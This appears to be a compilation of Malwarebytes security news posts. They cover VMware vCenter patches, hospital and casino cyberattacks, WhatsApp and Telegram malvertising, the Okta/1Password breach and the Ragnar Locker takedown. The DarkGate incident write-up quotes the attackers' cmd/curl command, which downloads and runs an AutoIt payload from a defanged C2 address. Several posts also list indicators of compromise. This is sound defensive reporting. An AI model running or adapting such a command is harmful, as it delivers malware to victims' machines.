IT News

We’ve always been committed to keeping you safe and secure online. But these days, cybersecurity isn’t just about defending you from malware; it’s about protecting your—and your family’s—entire digital identity.

We know that people are worried. In fact, in our latest report, titled “Everyone’s afraid of the internet and no one’s sure what to do about it,” we found that 79% of internet users are “very concerned” about online privacy and security risks.

More specifically, we found that 81% worry that identity theft and fraud could happen to them, and 71% say that having their data leaked and identity stolen is one of their biggest fears.

So today, I’m excited to announce we’re extending our product offering to introduce Malwarebytes Identity Theft Protection. Our comprehensive solution scours the dark web for your personal information, prevents your social media account from being hacked, and even keeps an eye on your credit¹ —and it’s all backed by an up-to-$2 million identity theft insurance².

Here’s what you get (based on your selected plan):

• Ongoing monitoring: Peace of mind that we are actively working in the background to keep you safe
• Real-time alerts: Immediate notifications if we identify suspicious activity
• Recommendations and best practices: Advice on how to prevent identity theft, and help if it happens
• Identity restoration helpline and top-notch customer support.

It’s not easy being online today, but our coverage helps keep your digital identity safe, giving you the confidence to scroll, swipe, click, and post in peace.

Learn more

Existing customers

Already a Malwarebytes customer and want to add Malwarebytes Identity Theft Protection to your subscription? Log into your account at my.malwarebytes.com and go to your subscription page. Click Upgrade, make the selection, and choose Submit Order. You’ll then receive your activation email.

¹ Credit scores provided are based on the VantageScore ® 3.0 model (likely to be different than what lenders may use to assess your credit worthiness).  Credit monitoring is US only.

² $1 or 2 million (based on selected plan). $2 million is US only.

Note: Malwarebytes Identity Theft Protection is not available in all regions.

VMWare has issued an update to address one out-of-bounds write and one information disclosure vulnerability in its server management software, vCenter Server.

Since there are no in-product workarounds, customers are advised to apply the updates urgently.

The affected products are VMware vCenter Server versions 7.0 and 8.0  and VMware Cloud Foundation versions 5.x and 4.x.

The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. The CVEs patched in these updates are CVE-2023-34048 and CVE-2023-34056.

CVE-2023-34048, an out-of-bounds write vulnerability in the vCenter Server’s implementation of the DCERPC protocol. A malicious actor with network access to could trigger an out-of-bounds write, potentially leading to remote code execution (RCE). The vulnerability has a CVSS score of 9.8 out of 10.

DCE/RPC, which is short for “Distributed Computing Environment / Remote Procedure Calls”, is the remote procedure call system developed to allow programmers to write distributed software as if it were all working on the same computer, without having to worry about the underlying network code.

An out-of-bounds write or read flaw makes it possible to manipulate parts of the memory which are allocated to more critical functions. This could allow an attacker to write code to a part of the memory where it will be executed with permissions that the program and user should not have.

VMware is not currently aware of exploitation “in the wild,” but urges customers to considered this an emergency change, and your organization should consider acting quickly.

CVE-2023-34056, a partial information disclosure vulnerability. A malicious actor with non-administrative privileges to vCenter Server could use this issue to access unauthorized data. It has a CVSS score 4.3 out of 10.

Patching

While VMware normally does not mention end-of-life products in VMware Security Advisories, due to the critical severity of this vulnerability and the lack of a workaround, VMware has made a patch generally available for vCenter Server 6.7U3, 6.5U3, and VCF 3.x. For the same reasons, VMware has made additional patches available for vCenter Server 8.0U1.

Fixed version(s) and release notes:

VMware vCenter Server 8.0U2
Downloads and Documentation:
https://customerconnect.vmware.com/downloads/details?downloadGroup=VC80U2&productId=1345&rPId=110105

VMware vCenter Server 8.0U1d
Downloads and Documentation:
https://customerconnect.vmware.com/downloads/details?downloadGroup=VC80U1D&productId=1345&rPId=112378

VMware vCenter Server 7.0U3o
Downloads and Documentation:
https://customerconnect.vmware.com/downloads/details?downloadGroup=VC70U3O&productId=974&rPId=110262

Cloud Foundation 5.x/4.x
https://kb.vmware.com/s/article/88287

VMWare also published an FAQ about this update.

We don’t just report on vulnerabilities—we identify them, and prioritize action.

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using Malwarebytes Vulnerability and Patch Management.

Canadian health service provider TransForm has published an update about the cyberattack at its member hospitals.

TransForm is a not-for-profit, shared service organization founded by the five hospitals in Erie St. Clair to manage their hospital IT, supply chain, and accounts payable needs.

The five affected hospitals, Bluewater Health, Chatham Kent Health Alliance, Erie Shores HealthCare, Hôtel-Dieu Grace Healthcare, and Windsor Regional Hospital, have had to reschedule appointments with their patients due to the attack.

On October 23, 2023, Transform released news that its member hospitals and Windsor-Essex Hospice were experiencing a systems outage, including email. In an update later that day it said that the incident is impacting the hospitals’ provision of care in various ways.

“For those patients who have care scheduled in the next few days, the hospitals will contact you directly, if possible, to reschedule or provide alternate arrangements.”

Even though TransForm does not provide any more details about the nature of the attack, it’s highly likely that this is a supply chain attack since all member hospitals are experiencing problems.

In a media release, the affected hospitals asked patients to reduce the impact by only visiting the hospitals if they need emergency care.

Because there is no clarity about the nature of the attack, it’s hard to say what other consequences it may have on the hospitals and their patients.

“We are investigating the cause and scope of incident, including whether any patient information was affected. Our investigation is ongoing and we will provide further updates, as appropriate.“

All parties have declined to comment until more information becomes available.

The risks of compromised supply chains keeps growing, and as long as organizations continue to rely on them without fully understanding the implications the risks are here to stay. It is essential for businesses and their suppliers to work together to harden their defenses, to minimize the risk of having their supply chain compromised.

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Malvertising is a powerful malware or scam delivery mechanism that makes it easy to target specific geographies or even users. A recent article from the South China Morning Post discussed an increase in malicious webpages for the popular WhatsApp communication tool, driven via malicious Google ads. The paper described how these ads appeared to be exclusively targeted at people from Hong Kong and have caused losses of about USD$300K last month.

We started investigating this situation and were able to identify what may be a similar campaign. The decoy sites we saw used a similar page than the web version of WhatsApp to trick victims into scanning a QR code to link their new device. Instead, it wasn’t the user’s device that was added to the WhatsApp account, but rather the threat actor’s.

We also found another campaign using an ad for messaging tool Telegram, to lure victims into downloading a malicious version of the program. Again, this attack was targeted at residents of Hong Kong.

We have reported the malicious ads to Google and worked with partners to take down the infrastructure used in these campaigns.

Malicious WhatsApp ad leads to QR code page

Just like the South China Morning Post stated that users were seeing malicious ads for WhatsApp, we were able to find one immediately after switching our online profile to use a Hong Kong IP address:

The text of the ad reads as follows (translated from Chinese):

WhatsApp New Version – WhatsApp Official Authorization

We are constantly updating and launching various fun and interesting functions as well as safe and reliable communication applications. Welcome to download and experience it. The cross-platform application brings you a reliable experience, and you can send private messages to your friends at any time.

Clicking on the ad leads to a convincing lookalike site in Chinese that pretends to be WhatsApp Web:

What’s interesting, and works well as a lure, is the fact that WhatsApp is not just a mobile phone app, but does indeed have a web version for computers as well. The real domain for it is hosted at web.whatsapp.com and also uses a QR code to add a linked device to your account. What this means is that you can use WhatsApp on your PC or Mac after you scan the QR code and authorize that new device from your phone.

The issue here is that the QR code you are scanning is from a malicious site that has nothing to do with WhatsApp:

The domain used to generate those QR codes (lawrencework[.]com) was registered just two days ago. A search on urlscan.io reveals that it is associated with several other fake WhatsApp pages. We tested the QR code by adding it from a burner phone with a brand new WhatsApp account without any previous linked devices. A few seconds later, we saw a new device was added (Google Chrome running on Mac OS):

While we could not get more information (IP address, geolocation) about this new device, we knew it was not ours. When you link a new device to your WhatsApp account, the saved chat history is synced to it. This means that an attacker can essentially read your entire past and future conversations and has access to your saved contacts.

Telegram ad links to malware

The second ad we saw related to this campaign was using Telegram as a lure. We know it is related to the above WhatsApp attack because the ad is from the same advertiser.

The text of the ad reads as follows (translated from Chinese):

telegram official website – telegram Chinese version – telegram download Telegram Chinese version is a Telegram client specially developed for Chinese users. Welcome to the Chinese channel, a new era of information, delivering more exciting information

It links to a Google Docs page pretending to be a download site:

Telegram instant messaging – simple, fast, secure and syncs across all your devices. It is one of the most downloaded apps in the world, with over 500 million active users. The latest official Telegram Chinese computer version TG-Chinese version: Click to download TG-PC: Click to download

The two links (identical) download an MSI installer from the following URL:

kolunite.oss-ap-southeast-7.aliyuncs[.]com/HIP-THH-19-1.msi

This installer has been injected with malware, which we can see once we execute it:

Targeted malvertising and motives

These two campaigns abusing the WhatsApp and Telegram brands could be used for a variety of reasons. We did not investigate further what the ultimate ploy was, although both lead to data theft, impersonation and malware. The threat actor could use any private information from past conversations, phish the victim’s contacts and much more.

This was our first foray into malvertising attacks targeted at Hong Kong. Given that this special administrative region of the People’s Republic of China has a long history of tensions with Beijing, we could not help but think that malvertising campaigns such as these could be used for political reasons, although we saw no evidence of it.

Linking additional devices via QR code is a useful feature but it can also easily be abused. It’s important to be cautious when scanning QR codes by verifying which site is issuing those. It’s a good idea to periodically check which devices have access to your accounts, and revoke any that you don’t recognize.

Thanks to Nathan Collier for the assist with the QR code scanning on Android.

Indicators of Compromise

Malicious WhatsApp domains

uaa.vvg2rt[.]top
wss.f8ddcc[.]com

QR code hostname

119srv[.]lawrencework[.]com

Telegram MSI URL

kolunite.oss-ap-southeast-7.aliyuncs[.]com/HIP-THH-19-1.msi

Telegram MSI

36d11b18d3345ff743f7b003d10a0820c8c1661dd7dc279434e436de798c3a4b

Password manager 1Password says it’s been affected by a breach at Okta, but it reports no user data has been stolen.

In a security incident report, 1Password says that a member of its IT team received an unexpected email suggesting they had initiated an Okta report of a list of admins. They hadn’t requested it so they reported the email to the security department.

An internal investigation showed unsolicited activity in the Okta environment which was traced to a suspicious IP address. Later it was confirmed that an attacker had accessed 1Password’s Okta environment using administrative privileges. 1Password says it took action straight away:

“We immediately terminated the activity, investigated, and found no compromise of user data or other sensitive systems, either employee-facing or user-facing.”

Okta breach

On Friday, Okta said it spotted an attacker using a stolen credential to access Okta’s support case management system. This allowed them to view files uploaded by certain Okta customers as part of recent support cases.

It’s normal for Okta support to ask customers to upload an HTTP Archive (HAR) file, which allows the team to troubleshoot issues by replicating what’s going on in the browser. As such, a HAR file can contain sensitive data, including cookies and session tokens, that cybercriminals can use to impersonate valid users.

A member of 1Password’s IT team was engaged with Okta support, and at their request, created and uploaded such a HAR file to the Okta Support Portal.

In the early morning hours of Friday, September 29, 2023 an unknown actor used the same Okta session that was used to create the HAR file to access the Okta administrative portal.

If the 1Password incident is a consequence of the same Okta breach, this puts the Okta breach which was discovered by BeyondTrust on October 2, 2023 in a new light as regards to the timeline. BeyondTrust says it had to persist with escalations within Okta until October 19, when Okta security leadership notified BeyondTrust that it had indeed experienced a breach and that BeyondTrust were one of the affected customers.

Okta says it has now notified all impacted customers.

“All customers who were impacted by this have been notified. If you’re an Okta customer and you have not been contacted with another message or method, there is no impact to your Okta environment or your support tickets.”

1Password suspects that the attackers were merely looking for information that would allow them to attack on a larger scale. They tried, for example, to access the IT team member’s user dashboard, but that attempt was blocked by Okta. They also requested a report of administrative users, which was the action that triggered the investigation.

A thorough investigation of the circumstances and the device that was used to upload the HAR file, did not reveal any reasons for the information to be captured. It did reveal which vendor 1Password relies on in a crisis though.

“The IT team member’s macOS laptop that was used is currently offline, and was scanned with the free version of Malwarebytes, which reported no findings.”

It wasn’t until after Okta revealed it’d had a security incident, that 1Password realized that the information was stolen during that incident.

Data breach

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

• Check the vendor’s advice. Every breach is different, so check with the vendor to find out what’s happened, and follow any specific advice they offer.
• Change your password. You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
• Enable two-factor authentication (2FA). If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
• Watch out for fake vendors. The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims, and verify any contacts using a different communication channel.
• Take your time. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.

Malwarebytes Managed Detection and Response (MDR) simply and effectively closes your security resources gap, reduces your risk of unknown threats, and increases your security efficiency exponentially. Malwarebytes MDR staffs highly experienced Tier 2 and Tier 3 analysts who are hands-on with customer endpoints, ensuring critical threats are quickly identified and a thorough response is rapidly deployed.

Want to learn more about MDR? Get a free trial below.

TRY NOW

Google is working out some kinks in the project formerly known as Gnatcatcher, which will now be known under the more descriptive name “IP Protection.” Which means that Chrome is reintroducing a proposal to hide users’ IP addresses, to make cross-site tracking more difficult.

An Internet Protocol (IP) address is a unique number that’s assigned to your computer when it joins a network. The number acts as your address on the network. In order for two computers to communicate, each must know the other’s address, so that messages go to the right place.

The IP address you use on the Internet is typically the one that your router is given by your ISP (Internet Service Provider). Although the IP address you use isn’t assigned to you permanently it will likely go unchanged until you disconnect or turn off your router. Blocks of IP addresses are assigned geographicaly, so it’s also possible to use them for a form of crude geolocation, accurate to about the nearest city.

Your IP address’s combination of persistence and uniqueness makes it a useful identifier for anyone who wants to track you across multiple websites. It can also be combined with other semi-permanent information from your browser to create an even more accurate “fingerprint”, that identifies you when you browse.

Over time this fingerprint can be used to build up a unique, persistent user profile that can be used for targeted advertising, which many people see as a threat to their privacy.

As a result, some users do not like to reveal their IP address, so they hide it using a proxy server or a VPN. Both proxies and VPNs mask a user’s IP address with one of their own. Only the proxy operator or VPN provider knows the user’s real address.

Google’s IP Protection proposal will use proxies to hide users’ IP addresses.

Because there are some potentially unwanted side-effects, and Google wants to learn as it goes, the feature will be tested and rolled out in multiple phases. In the first phase the feature will use a single Google-owned proxy, will only proxy requests to domains owned by Google, and will only work for users with US-based IP addresses.

Apparently Google wants to test the infrastructure without impacting third-party companies. Domains owned by Google include services like Gmail, but also AdServices. Note that in this phase Google will automatically enroll a small percentage of users, and they must be logged in to Chrome.

In later phases Google plans to  use a chain of two proxies so that neither proxy can see both the origin and destination IP addresses. There are some concerns that will need to be ironed out in the course of the testing phases:

• Defensibility, since a compromised proxy may be used to deploy attacks.
• Disruption of existing Denial of Service (DoS) defenses by using the two proxies.
• Disruption of existing defenses for fraud and invalid traffic detection. For example, depending on the way they work, some block-lists will no longer be effective because the final destination is not detected.

Google expects that this may change plans along the way, and states:

“Long term solutions will evolve and will be shaped in conjunction with the ecosystem. We will collaborate with ISPs, CDNs, third parties, and destination sites towards the end-state of privacy proxies for the web. For instance, ISPs and CDNs are well suited to operate privacy proxies.”

We will keep an eye on how this development takes shape. But, even if I could, I would not sign up for the first phase if I were a user that now uses a VPN to hide their IP address. Because in this phase Google will be able to see your IP address and the one you are visiting, which means you would only be shifting the information gathering from several Google services to one central point.

We don’t just report on privacy—we offer you the option to use it.

Privacy risks should never spread beyond a headline. Keep your online privacy yours by using Malwarebytes Privacy VPN.

Last week on Malwarebytes Labs:

• Ragnar Locker ransomware group taken down
• IT administrators’ passwords are awful too
• The hot topics from Europe’s largest trade fair for IT security
• Clever malvertising attack uses Punycode to look like KeePass’s official website
• 3 crucial security steps people should do, but don’t
• Cisco IOS XE vulnerability widely exploited in the wild
• The US wants governments to commit to not paying ransoms
• The forgotten malvertising campaign
• Customer data stolen from gaming cloud host Shadow

Stay safe!

Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

First publicly reported in 2018, DarkGate is a Windows-based malware with a wide-range of capabilities including credential stealing and remote access to victim endpoints. Until recently, it was only seen being delivered through traditional email malspam campaigns. In late August 2023, however, researchers at Trusec found evidence of a campaign using external Teams messages to deliver the DarkGate Loader.

On September 13th, 2023, the Malwarebytes MDR team spotted the same campaign on a client network.

The Initial Incident

The threat began as a phishing attempt via Microsoft Teams. The attackers sent a malicious ZIP file named “C_onfidential Sign_ificant Company Changes.zip” (the names may vary in different iterations of the attack).

Phishing message sent to targets via Microsoft Teams in the same DarkGate campaign. Image: Truesec

A number of employees clicked on this file believing it to be legitimate. Inside this ZIP file, however, were several malicious shortcut files, or LNK files, that were disguised as PDF documents.

The names of these LNK files included “EMPLOYEES_AFFECTED_BY_TRANSITION.PDF.LNK” and “COMPANY_TRANSFORMATIONS.PDF.LNK“.

The Malicious Command

When employees clicked on these shortcuts, it triggered a malicious command line. Its purpose? To download and run a harmful script from a remote IP address. Fortunately, Malwarebytes EDR recognized this IP as a ‘Known bad’ destination and blocked it.

Multiple attempts to execute processes such as curl commands

DarkGate Loader – The Culprit

As the MDR team delved deeper into the incident, they discovered that this was not a random attack. It was connected to a known malware attack campaign using Teams phishing to install DarkGate Loader. The use of the curl command is to fetch and deposit malicious files onto the victim’s machine:

"C:WindowsSystem32cmd.exe" /k curl -# -o

"C:Users[Redacted]AppDataLocalTempAutoit3.exe" "

http://5[.]188[.]87[.]58:2351" -o

"C:Users[Redacted]AppDataLocalTempbtbgvbyy.au3"

"http://5[.]188[.]87[.]58:2351/msibtbgvbyy" "C:Users[Redacted]AppDataLocalTempAutoit3.exe"

"C:Users[Redacted]AppDataLocalTempbtbgvbyy.au3" & exit

The malicious command attempts to run an AutoIt script (btbgvbyy.au3). Director of Threat Intelligence Jerome Segura notes the use of AutoIt, a legitimate scripting language, was already present in the very early versions of DarkGate.

Malwarebytes EDR recognizing suspicious AutoIt activity

Infected system exhibiting Indicators of Compromise (IOCs)

Recognizing the gravity of the situation, the team began collecting Indicators of Compromise (IOCs). This included hashes of the ZIP file, its contents, and samples of the malevolent script initiated by the shortcuts.

Actions Taken

Swift action was taken by isolating the affected machines. Although Malwarebytes EDR had already blocked the malicious IP, the MDR team took extra precautions, ensuring that no persistence mechanisms were present on the endpoints, which could have given attackers a backdoor to the system.

The MDR team also suggested blocking the download of files from external accounts in Microsoft Teams, which was the primary attack vector in this campaign.

Lessons from the Incident

By using a combination of evasion techniques, the threat actors behind these campaigns are able to distribute DarkGate with a minimal system footprint. If the infection had continued, the company could have faced potential data breaches, operational disruptions, financial losses, and more.

Fortunately, the collaborative efforts of Malwarebytes MDR, EDR, and the customer successfully mitigated the DarkGate malware and safeguarded the customer’s digital environment against possible reinfection.

Learn more about how Malwarebytes MDR today can help secure your organization: https://try.malwarebytes.com/mdr-consultation-new/

Get a Malwarebytes MDR quote

Read other front-line stories about how Malwarebytes MDR analysts do threat hunting on customer networks:

Tracking down a trojan: An inside look at threat hunting in a corporate network

Understanding ransomware reinfection: An MDR case study

Indicators of Compromise (IoC)

File Details:

Filename: C_onfidential Sign_ificant Company Changes.zip

Reported At: 09/13/2023 9:57:56 AM

Network Indicators:

C2 IP Address: 5[.]188[.]87[.]58

Malicious URLs:

http://5[.]188[.]87[.]58:2351

http://5[.]188[.]87[.]58:2351/msibtbgvbyy

This week on the Lock and Code podcast…

In September, the Las Vegas casino and hotel operator MGM Resorts became a trending topic on social media… but for all the wrong reasons. A TikTok user posted a video taken from inside the casino floor of the MGM Grand—the company’s flagship hotel complex near the southern end of the Las Vegas strip—that didn’t involve the whirring of slot machines or the sirens and buzzers of sweepstake earnings, but, instead, row after row of digital gambling machines with blank, non-functional screens. That same TikTok user commented on their own post that it wasn’t just errored-out gambling machines that were causing problems—hotel guests were also having trouble getting into their own rooms.

As the user said online about their own experience: “Digital keys weren’t working. Had to get physical keys printed. They doubled booked our room so we walked in on someone.”

The trouble didn’t stop there.

A separate photo shared online allegedly showed what looked like a Walkie-Talkie affixed to an elevator’s handrail. Above the device was a piece of paper and a message written by hand: “For any elevator issues, please use the radio for support.”  

As the public would soon learn, MGM Resorts was the victim of a cyberattack, reportedly carried out by a group of criminals called Scattered Spider, which used the ALPHV ransomware.

It was one of the most publicly-exposed cyberattacks in recent history. But just a few days before the public saw the end result, the same cybercriminal group received a reported $15 million ransom payment from a separate victim situated just one and a half miles away.

On September 14, Caesar’s Entertainment reported in a filing with the US Securities and Exchange Commission that it, too, had suffered a cyber breach, and according to reporting from CNBC, it received a $30 million ransom demand, which it then negotiated down by about 50 percent.

The social media flurry, the TikTok videos, the comments and confusion from customers, the ghost-town casino floors captured in photographs—it all added up to something strange and new: Vegas was breached. 

But how? 

Though follow-on reporting suggests a particularly effective social engineering scam, the attacks themselves revealed a more troubling, potential vulnerability for businesses everywhere, which is that a company’s budget—and its relative ability to devote resources to cybersecurity—doesn’t necessarily insulate it from attacks. 

Today on the Lock and Code podcast with host David Ruiz, we speak with James Fair, senior vice president of IT Services at the managed IT services company Executech, about whether businesses are taking cybersecurity seriously enough, which industries he’s seen pushback from for initial cybersecurity recommendations (and why), and the frustration of seeing some companies only take cybersecurity seriously after a major attack. 

“How many do we have to see? MGM got hit, you guys. Some of the biggest targets out there—people who have more cybersecurity budget than people can imagine—got hit. So, what are you waiting for?”

Tune in today to listen to the full conversation.

You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use.

Show notes and credits:

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 4.0 License
http://creativecommons.org/licenses/by/4.0/
Outro Music: “Good God” by Wowa (unminus.com)

Even though it had a long run for a ransomware group, it seems the bell might be tolling for Ragnar Locker. On October 19, 2023, the group’s leak site  was seized by an international group of law enforcement agencies.

The take down action was carried out between 16 and 20 October. During the action searches were conducted in Czechia, Spain and Latvia. The main target, suspected of being a developer of the Ragnar group, has been brought in front of the examining magistrates of the Paris Judicial Court.

The action was coordinated at international level by Europol and Eurojust. The ransomware group’s infrastructure was also seized in the Netherlands, Germany and Sweden and the associated data leak website was taken down in Sweden.

Ragnar Locker started its operations at the end of 2019, making it unusually long lived. Most ransomware groups do not survive that long, mostly due to internal struggles or a takedown such as this one.

Based on known attacks, as shown in out monthly ransomware reviews, Ragnar Locker was number 15 on the list of the most active ransomware groups over the last twelve months. (A known attack is one where a victim’s details are posted on a ransomware group’s leak website becasue they didn’t pay a ransom. The number of known attacks probably represents 50%-75% of the total attacks.)

Ragnar Locker has been called out for specifically targeting the energy sector—after attacks on Energias de Portugal (EDP) and Greek gas operator DESFA—but at Malwarebytes we never noticed any specialization. In the chart below, you can see it that across 36 known attacks in the last 12 months it attacked 15 different sectors.

In 2022, the FBI published a flash alert to warn that the Ragnar Locker ransomware gang had breached the networks of at least 52 organizations across 10 critical infrastructure sectors.

One of the biggest upsets occurred when Ragnar Locker published information it had stolen from police computers in Zwijndrecht, a municipality in the province of Antwerp, Belgium) The stolen information included police records about license plates, speeding tickets, and at least one case of child abuse. Other high profile victims include Campari and Capcom.

Ragnar Locker is not a Ransomware-as-a-Service (RaaS) that was constantly advertising for new affiliates, so we assume it worked with a pretty constant group of people. It also seemed capable of developing new attack methods, like the ESXi encryptor that was recently deployed by the Dark Angels group in an attack on Industrial giant Johnson Controls.

Ragnar Locker specifically targeted software commonly used by managed service providers (MSPs) to prevent its attacks from being detected and stopped. It also used the double extortion method of encryption and data theft pretty much from the start

The questionable honor of being the last victim posted on the leak site was IP international presence on October 6, 2023. There is always the chance that some victims are now left without an option to negotiate with the ransomware group.

How to avoid ransomware

• Block common forms of entry. Create a plan for patching vulnerabilities in internet-facing systems quickly; and disable or harden remote access like RDP and VPNs.
• Prevent intrusions. Stop threats early before they can even infiltrate or infect your endpoints. Use endpoint security software that can prevent exploits and malware used to deliver ransomware.
• Detect intrusions. Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
• Stop malicious encryption. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
• Create offsite, offline backups. Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
• Don’t get attacked twice. Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.

Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW